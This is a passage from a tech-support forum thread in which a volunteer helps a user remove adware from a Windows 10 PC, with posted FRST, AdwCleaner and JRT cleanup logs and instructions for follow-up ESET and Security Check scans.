"HKCR\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSynced" => key removed successfully
"HKCR\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSyncing" => key removed successfully
"HKCR\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637}" => key removed successfully
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtPending" => key removed successfully
"HKCR\Wow6432Node\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C}" => key removed successfully
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSynced" => key removed successfully
"HKCR\Wow6432Node\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202}" => key removed successfully
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSyncing" => key removed successfully
"HKCR\Wow6432Node\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637}" => key removed successfully
C:\Users\MuhammadAkim\AppData\Roaming\Curse Client\Bin\Curse.exe => not found.
C:\Users\MuhammadAkim\AppData\Local\MEGAsync\MEGAsync.exe => not found.
"HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}" => key removed successfully
HKCR\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{04C31380-2799-493E-A3C0-05D5EE7729AC}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04C31380-2799-493E-A3C0-05D5EE7729AC}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{09E882AD-8DCF-47DC-B2B7-933BAA9151D6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{09E882AD-8DCF-47DC-B2B7-933BAA9151D6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3487E524-CC1E-40C1-A28C-FFB73CFCACC5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3487E524-CC1E-40C1-A28C-FFB73CFCACC5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{42524D92-B8DF-4B2B-ADB3-9BBE516AAC18}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{42524D92-B8DF-4B2B-ADB3-9BBE516AAC18}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{949DE924-F62B-451E-BEF7-D4FA0E42D772} => key not found. 
C:\WINDOWS\System32\Tasks\gameo_update => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\gameo_update => key not found. 
"C:\Users\sesay\AppData\Roaming\Gameo" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C2E12A87-FAD3-4C99-AA05-CEBCCC871DA3}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C2E12A87-FAD3-4C99-AA05-CEBCCC871DA3}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DFB6070B-F7D4-4F4A-862C-E18D88730BF4}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DFB6070B-F7D4-4F4A-862C-E18D88730BF4}" => key removed successfully
C:\WINDOWS\System32\Tasks\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179}" => key removed successfully
 
 
The system needed a reboot.
 
==== End of Fixlog 22:23:36 ====
 
 
 
# AdwCleaner v5.032 - Logfile created 02/02/2016 at 19:03:06
# Updated 31/01/2016 by Xplode
# Database : 2016-02-02.1 [Server]
# Operating system : Windows 10 Home  (x64)
# Username : MuhammadAkim - BASEMENT-PC
# Running from : C:\Users\sesay\Desktop\AdwCleaner.exe
# Option : Cleaning
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
[-] Folder Deleted : C:\Users\sesay\AppData\Local\Gameo
[-] Folder Deleted : C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\mppnoffgpafgpgbaigljliadgbnhljfl
[-] Folder Deleted : C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\nafaimnnclfjfedmmabolbppcngeolgf
[-] Folder Deleted : C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\oppjbdkgpfhhllancffaoaemplhkngoc
[-] Folder Deleted : C:\Users\sesay\AppData\Roaming\GoldenGate
[-] Folder Deleted : C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Gameo
 
***** [ Files ] *****
 
[-] File Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.html.lnk
[-] File Deleted : C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_mppnoffgpafgpgbaigljliadgbnhljfl_0.localstorage
[-] File Deleted : C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_mppnoffgpafgpgbaigljliadgbnhljfl_0.localstorage-journal
[-] File Deleted : C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gameo.lnk
[-] File Deleted : C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Play Games Online.url
[-] File Deleted : C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HowToRemove.html.lnk
[-] File Deleted : C:\Users\sesay\Desktop\gameo.lnk
[-] File Deleted : C:\Users\sesay\Desktop\Play Games Online.url
 
***** [ DLLs ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
[-] Task Deleted : gameo_update
 
***** [ Registry ] *****
 
[-] Key Deleted : HKCU\Software\OMX_Media
[-] Key Deleted : HKCU\Software\PRODUCTSETUP
[-] Key Deleted : HKCU\Software\yahooprovidedsearch
[-] Key Deleted : HKU\.DEFAULT\Software\ByteFence
[!] Key Not Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\Software\OMX_Media
[!] Key Not Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\Software\PRODUCTSETUP
[!] Key Not Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\Software\yahooprovidedsearch
[-] Key Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\gameo
[-] Key Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\GoldenGate
[-] Key Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\OMX_Media
[-] Key Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\PRODUCTSETUP
[-] Key Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\System Healer
[-] Key Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\yahooprovidedsearch
[-] Key Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\Microsoft\Windows\CurrentVersion\Uninstall\gameo
[-] Data Restored : HKCU\Software\Microsoft\Internet Explorer\Main [Secondary Start Pages]
[!] Data Not Restored : HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\Software\Microsoft\Internet Explorer\Main [Secondary Start Pages]
[-] Value Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\Microsoft\Windows\CurrentVersion\Run [Gameo]
[-] Value Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [Gameo]
 
***** [ Web browsers ] *****
 
[-] [C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : aol.com
[-] [C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : ask.com
[-] [C:\Users\abang\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : aol.com
[-] [C:\Users\abang\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : ask.com
[-] [C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : aol.com
[-] [C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : ask.com
[-] [C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : dts.search.ask.com
[-] [C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : search.ask.com
[-] [C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Startup_URLs] Deleted : hxxp://www.search.ask.com/?o=APN10645A&gct=hp&d=406-679&v=n9092-93&t=4
[-] [C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : mppnoffgpafgpgbaigljliadgbnhljfl
[-] [C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : nafaimnnclfjfedmmabolbppcngeolgf
[-] [C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : oppjbdkgpfhhllancffaoaemplhkngoc
[-] [C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Homepage] Deleted : hxxp://www.search.ask.com/?o=APN10645A&gct=hp&d=406-679&v=n9092-93&t=4
[-] [C:\Users\hakim\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : aol.com
[-] [C:\Users\hakim\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : ask.com
 
*************************
 
:: "Tracing" keys removed
:: Winsock settings cleared
 
########## EOF - \AdwCleaner\AdwCleaner[C1].txt - [5777 bytes] ##########
 

 



#13 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,957 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:10:42 PM

Posted 05 February 2016 - 10:54 PM

Let me know if there is any change after your last steps.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#14 Alban18

Alban18
  • Topic Starter

  • Members
  • 34 posts
  • OFFLINE
  •  
  • Local time:01:42 AM

Posted 06 February 2016 - 03:56 PM

I ran jrt.exe a couple days ago but couldn't find the log file after I closed it.
So after running it today, the system is clean.
 
My cousin said he didn't experience the freezing anymore. He complained about the game lagging but that has to do with the computer performance.
 
I'm sorry to waste your time since I think it was a trivial and small problem but what was the reason this problem happened? Was it actually a virus? How can he prevent this from happening again?
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.2 (01.06.2016)
Operating System: Windows 10 Home x64 
Ran by MuhammadAkim (Administrator) on Sat 02/06/2016 at 15:48:36.67
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 0 
 
 
 
 
Registry: 0 
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sat 02/06/2016 at 15:51:12.78
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Thank you


#15 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,957 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:10:42 PM

Posted 06 February 2016 - 04:40 PM

Systems can hang for a variety of reasons and in this case it is hard to tell why. There was a bit of junk detected and removed.

I would like to run 2 last things if you are able.

===================================================

ESET Online Scanner

--------------------

I'd like us to scan your machine with ESET OnlineScan This process may may take several hours, that is normal.
  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click Run ESET Online Scanner.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the icon on your desktop.
  • Check YES, I accept the Terms of Use.
  • Click the Start button.
  • Click Enable detection of potentially unwanted applications
  • Accept any security warnings from your browser.
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Copy and paste the information in your next reply. Note: If no malware was found you will not get a log.
  • Click the Back button.
  • Check Uninstall application on close and Delete quarantined files
  • Click the Finish button.
  • Close the ESET window and reboot your computer
===================================================

screen317's Security Check

--------------------
  • Please download screen317's Security Check to your desktop
  • Double-click icon to launch the program
  • Click OK
  • Select Run Note: If you receive an error message saying UNSUPPORTED OPERATING SYSTEM! ABORTED! reboot your computer and attempt to run it again
  • Allow the program to run
  • A Notepad document will open on your desktop. Please copy and paste the contents in your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • ESET log
  • Security Check log
  • How is your computer running?

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users